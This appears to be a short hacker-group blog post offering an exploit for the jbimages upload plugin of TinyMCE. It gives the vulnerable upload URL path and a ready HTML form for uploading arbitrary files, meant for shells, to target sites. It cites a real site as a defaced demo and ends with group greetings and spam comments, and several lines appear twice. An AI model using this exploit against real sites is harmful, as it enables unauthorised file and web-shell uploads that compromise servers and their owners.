Exploit jBImages Tinymce
Exploit jBImages Tinymce
POC :
sitecom/path/tinymce/plugins/jbimages/ci/index.php?upload/english
sitecom/path/tinymce/plugins/jbimages/ci/index.php?upload/english
CSRF:
<form enctype="multipart/form-data" action="sitecom/path/tinymce/plugins/jbimages/ci/index.php?upload/english" method="post">
<input type="file" name="userfile" multiple="multiple">
<input name="upload_target" value="./">
<input type="submit" value="josskan!">
</form>
<form enctype="multipart/form-data" action="sitecom/path/tinymce/plugins/jbimages/ci/index.php?upload/english" method="post">
<input type="file" name="userfile" multiple="multiple">
<input name="upload_target" value="./">
<input type="submit" value="josskan!">
</form>
Shells uploaded : ???
Demo : Here
Files uploaded : http://calptower.org/images/hacked.jpg
Typical Idiot Security
Greet's : Zerobyte.ID - IndoXploit
Greet's : Zerobyte.ID - IndoXploit
Thanks for your share! badoink app cool math gem swap 2 tai home.vn ae fruit slash game
ReplyDeletehttps://www.wallpaperkita.eu.org/
ReplyDelete